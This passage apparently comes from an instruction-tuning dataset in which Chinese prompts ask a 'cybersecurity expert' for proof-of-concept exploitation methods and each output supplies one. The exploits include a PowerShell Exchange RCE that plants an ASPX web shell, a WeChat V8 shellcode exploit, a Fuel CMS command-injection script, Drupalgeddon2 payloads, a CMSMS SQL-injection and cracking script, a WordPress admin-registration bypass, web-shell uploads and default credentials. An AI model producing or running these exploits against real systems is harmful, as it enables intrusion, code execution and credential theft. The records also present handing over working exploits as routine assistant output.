C:\\Windows\\system32>Get-RoleGroup \"cert users\" | Format-List\n#\n#\n# RunspaceId                  : a97d7e2c-d036-4bfc-b95c-4fabcb644160\n# ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}\n# RoleAssignments             : {Exchange Server Certificates-cert users}\n# Roles                       : {Exchange Server Certificates}\n# DisplayName                 :\n# ExternalDirectoryObjectId   :\n# Members                     : {exchangedemo.com/Users/Harry Houdini}\n# SamAccountName              : cert users\n# Description                 :\n# RoleGroupType               : Standard\n# LinkedGroup                 :\n# Capabilities                : {}\n# LinkedPartnerGroupId        :\n# LinkedPartnerOrganizationId :\n# Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/cert users\n# IsValid                     : True\n# ExchangeVersion             : 0.10 (14.0.100.0)\n# Name                        : cert users\n# DistinguishedName           : CN=cert users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com\n# Guid                        : 6fb0b860-2cc2-4fe1-9489-d93dbbed8c9f\n# ObjectCategory              : exchangedemo.com/Configuration/Schema/Group\n# ObjectClass                 : {top, group}\n# WhenChanged                 : 6/12/2020 4:15:54 AM\n# WhenCreated                 : 6/12/2020 1:34:51 AM\n# WhenChangedUTC              : 6/11/2020 8:15:54 PM\n# WhenCreatedUTC              : 6/11/2020 5:34:51 PM\n# OrganizationId              :\n# Id                          : exchangedemo.com/Microsoft Exchange Security Groups/cert users\n# OriginatingServer           : DEAD01.exchangedemo.com\n# ObjectState                 : Changed\n#\n# Example:\n#\n# PS C:\\Users\\researcher> .\\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harryh@exchangedemo.com -pwd user123### -cmd mspaint\n# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harryh@exchangedemo.com:user123###\n# (+) wrote to target file C:/Windows/Temp/rXq1U2tD.hta\n# (+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/4VFQwc7W.aspx\n# (+) shell written, executing command...\n# (+) executed mspaint as SYSTEM!\n# PS C:\\Users\\researcher>\n\nparam (\n    [Parameter(Mandatory=$true)][string]$server,\n    [Parameter(Mandatory=$true)][string]$usr,\n    [Parameter(Mandatory=$true)][string]$pwd,\n    [string]$cmd = \"mspaint\"\n)\n \nFunction Get-RandomAlphanumericString {\n    [CmdletBinding()]\n    Param (\n        [int] $length = 8\n    )\n    Process{\n        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )\n    }    \n}\n\nfunction Writebad-File{\n    Param (\n        [string] $fn,\n        [string] $content,\n        [System.Management.Automation.Runspaces.PSSession] $session\n    )\n    $selector = Get-RandomAlphanumericString\n    Invoke-Command -Session $session -ScriptBlock {\n        New-ExchangeCertificate -BinaryEncoded -GenerateRequest -SubjectName \"c=$Using:selector,o=$Using:content,cn=si\"\n    } | Out-Null\n    $thumb = Invoke-Command -Session $session -ScriptBlock {\n         Get-ExchangeCertificate \n    } | Where-Object -Property Subject -like \"*c=$selector*\" | select-object -Expand Thumbprint\n\n    # this is where the file write is for this bug\n    Invoke-Command -Session $session -ScriptBlock {\n         Export-ExchangeCertificate -Thumbprint $Using:thumb -FileName $Using:fn -BinaryEncoded;\n    } | Out-Null\n}\nfunction Exploit-Exchange {\n    Param (\n        [string] $server,\n        [string] $usr,\n        [string] $pwd,\n        [string] $cmd\n    )\n    \"(+) targeting $server with ${usr}:$pwd\"\n    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force\n    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)\n    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds\n    $hta = Get-RandomAlphanumericString\n    $aspx = Get-RandomAlphanumericString\n    \n    # write a hta file with commands\n    Writebad-File -fn \"C:/Windows/Temp/$hta.hta\" -content \"<script>new ActiveXObject('WScript.Shell').Exec('cmd /c $cmd')</script>\" -session $s\n    \"(+) wrote to target file C:/Windows/Temp/$hta.hta\" \n    \n    # write aspx file\n    Writebad-File -fn \"C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\" -content \"<%=System.Diagnostics.Process.Start(Request[Request.HttpMethod])%>\" -session $s\n    \"(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\" \n    \"(+) shell written, executing command...\"\n    $b = @{\n        destination = \"https://$server/ecp/$aspx.aspx?GET=C:/Windows/Temp/$hta.hta\"\n        flags = ''\n        username = $usr\n        password = $pwd\n    }\n    $r = Invoke-WebRequest \"https://$server/owa/auth.owa\" -SessionVariable 'websess' -Body $b -Method 'POST' | Select-Object -Expand Forms\n    if ([string]::IsNullOrWhiteSpace($r)) {\n        \"(+) executed $cmd as SYSTEM!\"\n    } else {\n        \"(-) exploit failed\"\n    }    \n}\n\nGet-PSSession | Remove-PSSession\nExploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd\n2. } | Where-Object -Property Subject -like \"*c=$selector*\" | select-object -Expand Thumbprint\n3. \"(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\"\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Exchange Server 远程执行代码漏洞 CVE-2020-17083.md"}
    17. 

  17. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:腾讯 企业微信 agentinfo 信息泄漏漏洞\n漏洞描述:腾讯 企业微信 agentinfo 接口存在信息泄漏漏洞,攻击者通过漏洞可以获取企业微信 Secret\n影响版本:腾讯 企业微信\n网络测绘:``` web.body=\"wework_admin.normal_layout\" ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. web.body=\"wework_admin.normal_layout\"\n2. /cgi-bin/gateway/agentinfo\n3. https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=<YOUR_CORPID>&corpsecret=<YOUR_CORPSECRET>\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/腾讯 企业微信 agentinfo 信息泄漏漏洞.md"}
    18. 

  18. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Git for Visual Studio远程执行代码漏洞 CVE-2021-21300\n漏洞描述:此漏洞影响具有不区分大小写的文件系统的平台,当某些过滤器被使用时(例如Git LFS)。Git可能会被欺骗运行克隆期间的远程代码。\n影响版本:``` v2.17.6 v2.18.5 v2.19.6 v2.20.5 v2.21.4 v2.22.5 v2.23.4 v2.24.4 v2.25.5 v2.26.3 v2.27.1 v2.28.1 v2.29.3 v2.30.2 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2021-21300\n【POC利用方法】\n1. v2.17.6\nv2.18.5\nv2.19.6\nv2.20.5\nv2.21.4\nv2.22.5\nv2.23.4\nv2.24.4\nv2.25.5\nv2.26.3\nv2.27.1\nv2.28.1\nv2.29.3\nv2.30.2\n2. #!/bin/sh\n\ngit init delayed-checkout &&\n(\n  cd delayed-checkout &&\n  echo \"A/post-checkout filter=lfs diff=lfs merge=lfs\" \\\n  \t>.gitattributes &&\n  mkdir A &&\n  printf '#!/bin/sh\\n\\necho PWNED >&2\\n' >A/post-checkout &&\n  chmod +x A/post-checkout &&\n  >A/a &&\n  >A/b &&\n  git add -A &&\n  rm -rf A &&\n  ln -s .git/hooks a &&\n  git add a &&\n  git commit -m initial\n) &&\ngit clone delayed-checkout cloned\n3. printf '#!/bin/sh\\n\\necho PWNED >&2\\n' >A/post-checkout &&\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Git for Visual Studio远程执行代码漏洞 CVE-2021-21300.md"}
    19. 

  19. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:微信客户端 远程命令执行漏洞\n漏洞描述:微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 参考链接: - https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ\n影响版本:``` 微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 ```\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【POC利用方法】\n1. 微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41\n2. ENABLE_LOG = true;\nIN_WORKER = true;\n\n// run calc and hang in a loop\nvar shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的\n\nfunction print(data) {\n}\n\n\nvar not_optimised_out = 0;\nvar target_function = (function (value) {\n    if (value == 0xdecaf0) {\n        not_optimised_out += 1;\n    }\n    not_optimised_out += 1;\n    not_optimised_out |= 0xff;\n    not_optimised_out *= 12;\n});\n\nfor (var i = 0; i < 0x10000; ++i) {\n    target_function(i);\n}\n\n\nvar g_array;\nvar tDerivedNCount = 17 * 87481 - 8;\nvar tDerivedNDepth = 19 * 19;\n\nfunction cb(flag) {\n    if (flag == true) {\n        return;\n    }\n    g_array = new Array(0);\n    g_array[0] = 0x1dbabe * 2;\n    return 'c01db33f';\n}\n\nfunction gc() {\n    for (var i = 0; i < 0x10000; ++i) {\n        new String();\n    }\n}\n\nfunction oobAccess() {\n    var this_ = this;\n    this.buffer = null;\n    this.buffer_view = null;\n\n    this.page_buffer = null;\n    this.page_view = null;\n\n    this.prevent_opt = [];\n\n    var kSlotOffset = 0x1f;\n    var kBackingStoreOffset = 0xf;\n\n    class LeakArrayBuffer extends ArrayBuffer {\n        constructor() {\n            super(0x1000);\n            this.slot = this;\n        }\n    }\n\n    this.page_buffer = new LeakArrayBuffer();\n    this.page_view = new DataView(this.page_buffer);\n\n    new RegExp({ toString: function () { return 'a' } });\n    cb(true);\n\n    class DerivedBase extends RegExp {\n        constructor() {\n            // var array = null;\n            super(\n                // at this point, the 4-byte allocation for the JSRegExp `this` object\n                // has just happened.\n                {\n                    toString: cb\n                }, 'g'\n                // now the runtime JSRegExp constructor is called, corrupting the\n                // JSArray.\n            );\n\n            // this allocation will now directly follow the FixedArray allocation\n            // made for `this.data`, which is where `array.elements` points to.\n            this_.buffer = new ArrayBuffer(0x80);\n            g_array[8] = this_.page_buffer;\n        }\n    }\n\n    // try{\n    var derived_n = eval(`(function derived_n(i) {\n        if (i == 0) {\n            return DerivedBase;\n        }\n\n        class DerivedN extends derived_n(i-1) {\n            constructor() {\n                super();\n                return;\n                ${\"this.a=0;\".repeat(tDerivedNCount)}\n            }\n        }\n\n        return DerivedN;\n    })`);\n\n    gc();\n\n\n    new (derived_n(tDerivedNDepth))();\n\n    this.buffer_view = new DataView(this.buffer);\n    this.leakPtr = function (obj) {\n        this.page_buffer.slot = obj;\n        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);\n    }\n\n    this.setPtr = function (addr) {\n        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);\n    }\n\n    this.read32 = function (addr) {\n        this.setPtr(addr);\n        return this.page_view.getUint32(0, true, ...this.prevent_opt);\n    }\n\n    this.write32 = function (addr, value) {\n        this.setPtr(addr);\n        this.page_view.setUint32(0, value, true, ...this.prevent_opt);\n    }\n\n    this.write8 = function (addr, value) {\n        this.setPtr(addr);\n        this.page_view.setUint8(0, value, ...this.prevent_opt);\n    }\n\n    this.setBytes = function (addr, content) {\n        for (var i = 0; i < content.length; i++) {\n            this.write8(addr + i, content[i]);\n        }\n    }\n    return this;\n}\n\nfunction trigger() {\n    var oob = oobAccess();\n\n    var func_ptr = oob.leakPtr(target_function);\n    print('[*] target_function at 0x' + func_ptr.toString(16));\n\n    var kCodeInsOffset = 0x1b;\n\n    var code_addr = oob.read32(func_ptr + kCodeInsOffset);\n    print('[*] code_addr at 0x' + code_addr.toString(16));\n\n    oob.setBytes(code_addr, shellcode);\n\n    target_function(0);\n}\n\ntry{\n    print(\"start running\");\n    trigger();\n}catch(e){\n    print(e);\n}\n3. target_function(i);\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/微信客户端 远程命令执行漏洞.md"}
    20. 

  20. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Word 远程代码执行漏洞 CVE-2023-21716\n漏洞描述:Microsoft Office Word是微软公司的一个文字处理器应用程序。Word给用户提供了用于创建专业而优雅的文档工具。 该漏洞存在于Microsoft Word的RTF解析器(wwlib)中,是一个远程代码执行漏洞,攻击者可以制作包含过多字体表项的RTF文件,并诱导用户打开来利用此漏洞。攻击者可利用多种方式诱导用户下载并打开特制文档,如电子邮件、即时消息等等。用户使用预览窗格也会触发此漏洞。成功利用此漏洞可能在目标系统上以该用户权限执行代码。 近日漏洞发现者 Joshua J. Drake 公布了漏洞的 POC。 参考链接: - https://qoop.org/publications/cve-2023-21716-rtf-fonttbl.md\n", "input": "", "output": "【漏洞类型】other_vulnerability\n【CVE编号】CVE-2023-21716\n【POC利用方法】\n1. Windows 10 x64 1607\nOffice 2016,Windbg,IDA Pro 7.5\nwwlib(16.0.4266.1003)\n2. import sys\nopen(\"t3zt.rtf\",\"wb\").write((\"{\\\\rtf1{\\n{\\\\fonttbl\" + \"\".join([ (\"{\\\\f%dA;}\\n\" % i) for i in range(0,32761) ]) + \"}\\n{\\\\rtlch no crash??}\\n}}\\n\").encode('utf-8'))\n3. {\\rtf1{\n{\\fonttbl{\\f0A;}\n{\\f1A;}\n{\\f2A;}\n{\\f3A;}\n{\\f4A;}\n{\\f5A;}\n{\\f6A;}\n...\n{\\f32755A;}\n{\\f32756A;}\n{\\f32757A;}\n{\\f32758A;}\n{\\f32759A;}\n{\\f32760A;}\n}\n{\\rtlch no crash??}\n}}\n", "category": "poc_other_vulnerability", "source": "awesome_poc_dataset", "file_path": "其他漏洞/Microsoft Word 远程代码执行漏洞 CVE-2023-21716.md"}
    21. 

  21. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nacos 漏洞 Checklist\n", "input": "", "output": "【漏洞类型】unknown_vulnerability\n【POC利用方法】\n1. nacos/nacos\n2. /nacos/v1/auth/users?pageNo=1&pageSize=9\n3. /nacos/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=\n", "category": "poc_unknown_vulnerability", "source": "awesome_poc_dataset", "file_path": "CHECKLIST/Nacos 漏洞 Checklist.md"}
    22. 

  22. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:安全设备漏洞 Checklist\n", "input": "", "output": "【漏洞类型】unknown_vulnerability\n【POC利用方法】\n1. app=\"齐治科技-堡垒机\"\n2. shterm/shterm\n3. POST /shterm/listener/tui_update.php\n\na=[\"t';import os;os.popen('whoami')#\"]\n", "category": "poc_unknown_vulnerability", "source": "awesome_poc_dataset", "file_path": "CHECKLIST/安全设备漏洞 Checklist.md"}
    23. 

  23. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SmartBi 漏洞 Checklist\n", "input": "", "output": "【漏洞类型】unknown_vulnerability\n【POC利用方法】\n1. app=\"SMARTBI\"\n2. https://127.0.0.1/vision/mobileportal.jsp\nhttps://127.0.0.1/vision/mobileX/login\nhttps://127.0.0.1/vision/index.jsp\nhttps://127.0.0.1/smartbi/vision/index.jsp\n3. demo/demo\nmanager/demo\nadmin/admin\nadmin/manager\nadmin/2manager\n", "category": "poc_unknown_vulnerability", "source": "awesome_poc_dataset", "file_path": "CHECKLIST/SmartBi 漏洞 Checklist.md"}
    24. 

  24. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fuel CMS 1.4.1 远程代码执行漏洞\n漏洞描述:参考链接: * https://github.com/nahi/httpclient/issues/242 * https://www.exploit-db.com/exploits/49487\n网络测绘:``` \"Fuel CMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'\n2. #!/usr/bin/env ruby\n\nrequire 'httpclient'\nrequire 'docopt'\n\n# dirty workaround to ignore Max-Age\n# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932\n$VERBOSE = nil\n\ndoc = <<~DOCOPT\n  Fuel CMS 1.4 - Remote Code Execution\n\n  Usage:\n    #{__FILE__} <url> <cmd>\n    #{__FILE__} -h | --help\n\n  Options:\n    <url>         Root URL (base path) including HTTP scheme, port and root folder\n    <cmd>         The system command to execute\n    -h, --help    Show this screen\n\n  Examples:\n    #{__FILE__} http://example.org id\n    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'\nDOCOPT\n\ndef exploit(client, root_url, cmd)\n  url = root_url + \"/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'\"\n\n  res = client.get(url)\n\n  /system(.+?)<div/mx.match(res.body).captures[0].chomp\nend\n\nbegin\n  args = Docopt.docopt(doc)\n  clnt = HTTPClient.new\n  puts exploit(clnt, args['<url>'], args['<cmd>'])\nrescue Docopt::Exit => e\n  puts e.message\nend\n3. url = root_url + \"/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'\"\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Fuel CMS 1.4.1 远程代码执行漏洞.md"}
    25. 

  25. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Joomla 目录遍历及远程代码执行漏洞 CVE-2021-23132\n漏洞描述:Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,是全球知名的一套内容管理系统(CMS)。 本漏洞涉及到目录遍历及进一步导致的RCE漏洞。在Joomla! 3.0.0到3.9.24版本中,Joomla!的com_media组件配置允许被任意修改导致Web级别目录遍历,攻击者通过一系列操作,进一步会导致远程命令执行。\n影响版本:``` 3.0.0 <= Joomla! <= 3.9.24 ```\n网络测绘:``` app=\"Joomla\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2021-23132\n【POC利用方法】\n1. 3.0.0 <= Joomla! <= 3.9.24\n2. app=\"Joomla\"\n3. http://target/templates/protostar/error.php?cmd=ls\npython3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234  -rce 1 -cmd ls\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Joomla 目录遍历及远程代码执行漏洞 CVE-2021-23132.md"}
    26. 

  26. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PigCMS action_flashUpload 任意文件上传漏洞\n漏洞描述:PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限\n影响版本:pigcms\n网络测绘:``` app.name=\"PigCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app.name=\"PigCMS\"\n2. POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1\nHost:\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form-data; boundary=----aaa\n\n------aaa\nContent-Disposition: form-data; name=\"filePath\"; filename=\"test.php\"\nContent-Type: video/x-flv\n\n<?php phpinfo();?>\n------aaa\n3. /cms/upload/images/2023/08/11/1691722887xXbx.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/PigCMS action_flashUpload 任意文件上传漏洞.md"}
    27. 

  27. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TypesetterCMS 后台任意文件上传\n漏洞描述:可以通过将.php放在.zip文件中并解压缩来绕过对.php文件的保护。一旦完成,就可以使用恶意的php文件(webshell)在计算机上执行命令\n影响版本:``` Typesetter CMS 5-5.1 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. Typesetter CMS 5-5.1\n2. [Github 绕过文件上传限制导致命令执行](https://github.com/Typesetter/Typesetter/issues/674)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/TypesetterCMS 后台任意文件上传.md"}
    28. 

  28. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal Drupalgeddon 2 远程代码执行漏洞 CVE-2018-7600\n漏洞描述:Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关分析如下: - https://research.checkpoint.com/uncovering-drupalgeddon-2/\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2018-7600\n【POC利用方法】\n1. docker-compose up -d\n2. POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost: your-ip:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 103\n\nform_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id\n3. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo `ls -al` | tee 1.txt'}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal Drupalgeddon 2 远程代码执行漏洞 CVE-2018-7600.md"}
    29. 

  29. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AspCMS commentList.asp SQL注入漏洞\n漏洞描述:AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码\n影响版本:``` AspCMS ```\n网络测绘:``` app=\"ASPCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"ASPCMS\"\n2. /plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/AspCMS commentList.asp SQL注入漏洞.md"}
    30. 

  30. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175\n漏洞描述:未经身份验证的用户可以使用\"theplus_ajax_login\"和\"theplus_google_ajax_register\" Ajax请求,通过仅提供相关的用户名,就可以像任何用户一样轻松地进行身份验证。 参考链接: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175 - https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89\n影响版本:``` Elementor Page Builder <4.1.7 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2021-24175\n【POC利用方法】\n1. Elementor Page Builder <4.1.7\n2. curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php\ncurl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php\n3. <form method=\"POST\" action=\"https://example.com/wp-admin/admin-ajax.php\">\n<input value=\"newadmin\" name=\"name\" type=\"text\">\n<input value=\"test@example.com\" name=\"email\" type=\"text\">\n<input value=\"test\" name=\"password\" type=\"text\">\n<input value=\"theplus_google_ajax_register\" name=\"action\" type=\"text\">\n<input value=\"administrator\" name=\"tp_user_reg_role\" type=\"text\">\n<input value=\"any\" name=\"nonce\" type=\"text\">\n<input type=\"submit\" />\n</form>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175.md"}
    31. 

  31. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002\n漏洞描述:Ke361 DistrictController.class.php index() 函数 pid参数存在 SQL注入漏洞,通过漏洞可以获取数据库敏感信息\n影响版本:``` Ke361 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. admin.php?s=/District/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+\n2. https://gitee.com/jcove/ke361\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Ke361 DistrictController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md"}
    32. 

  32. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:emlog widgets.php 后台SQL注入漏洞\n漏洞描述:emlog widgets.php文件在登录后通过构造特殊语句导致SQL注入,获取数据库敏感信息\n影响版本:``` emlog 6.0 ```\n网络测绘:``` app=\"EMLOG\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"EMLOG\"\n2. if ($action == 'compages') {\n    $wgNum = isset($_POST['wgnum']) ? intval($_POST['wgnum']) : 1;//侧边栏编号 1、2、3 ……\n    $widgets = isset($_POST['widgets']) ? serialize($_POST['widgets']) : '';\n    Option::updateOption(\"widgets{$wgNum}\", $widgets);\n    $CACHE->updateCache('options');\n    emDirect(\"./widgets.php?activated=true&wg=$wgNum\");\n}\n3. static function updateOption($name, $value, $isSyntax = false){\n        $DB = Database::getInstance();\n        $value = $isSyntax ? $value : \"'$value'\";\n        $DB->query('UPDATE '.DB_PREFIX.\"options SET option_value=$value where option_name='$name'\");\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/emlog widgets.php 后台SQL注入漏洞.md"}
    33. 

  33. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053\n漏洞描述:CMS Made Simple(CMSMS)是一个免费的开放源码内容管理系统,为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。 在 2.2.9.1 之前的版本中,CMS Made Simple 存在一个未验证的 SQL 注入漏洞,攻击者可利用该漏洞获取管理员密码或密码重置令牌。结合后台的 SSTI 漏洞([CVE-2021-26120](https://github.com/vulhub/vulhub/tree/master/cmsms/CVE-2021-26120)),攻击者可在目标服务器上执行任意代码。 参考链接: - [https://www.exploit-db.com/exploits/46635](https://www.exploit-db.com/exploits/46635) - [https://srcincite.io/pocs/cve-2021-26120.py.txt](https://srcincite.io/pocs/cve-2021-26120.py.txt)\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-9053\n【POC利用方法】\n1. docker compose up -d\n2. (py27) python poc.py -u http://your-vps-ip\n3. #!/usr/bin/env python\n# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9\n# Date: 30-03-2019\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https://www.cmsmadesimple.org/\n# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/\n# Version: <= 2.2.9\n# Tested on: Ubuntu 18.04 LTS\n# CVE : CVE-2019-9053\n\nimport requests\nfrom termcolor import colored\nimport time\nfrom termcolor import cprint\nimport optparse\nimport hashlib\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target uri (ex. http://10.10.10.100/cms)\")\nparser.add_option('-w', '--wordlist', action=\"store\", dest=\"wordlist\", help=\"Wordlist for crack admin password\")\nparser.add_option('-c', '--crack', action=\"store_true\", dest=\"cracking\", help=\"Crack password with wordlist\", default=False)\n\noptions, args = parser.parse_args()\nif not options.url:\n    print \"[+] Specify an url target\"\n    print \"[+] Example usage (no cracking password): exploit.py -u http://target-uri\"\n    print \"[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist\"\n    print \"[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.\"\n    exit()\n\nurl_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'\nsession = requests.Session()\ndictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'\nflag = True\npassword = \"\"\ntemp_password = \"\"\nTIME = 1\ndb_name = \"\"\noutput = \"\"\nemail = \"\"\n\nsalt = ''\nwordlist = \"\"\nif options.wordlist:\n    wordlist += options.wordlist\n\ndef crack_password():\n    global password\n    global output\n    global wordlist\n    global salt\n    dict = open(wordlist)\n    for line in dict.readlines():\n        line = line.replace(\"\\n\", \"\")\n        beautify_print_try(line)\n        if hashlib.md5(str(salt) + line).hexdigest() == password:\n            output += \"\\n[+] Password cracked: \" + line\n            break\n    dict.close()\n\ndef beautify_print_try(value):\n    global output\n    print \"\\033c\"\n    cprint(output,'green', attrs=['bold'])\n    cprint('[*] Try: ' + value, 'red', attrs=['bold'])\n\ndef beautify_print():\n    global output\n    print \"\\033c\"\n    cprint(output,'green', attrs=['bold'])\n\ndef dump_salt():\n    global flag\n    global salt\n    global output\n    ord_salt = \"\"\n    ord_salt_temp = \"\"\n    while flag:\n        flag = False\n        for i in range(0, len(dictionary)):\n            temp_salt = salt + dictionary[i]\n            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]\n            beautify_print_try(temp_salt)\n            payload = 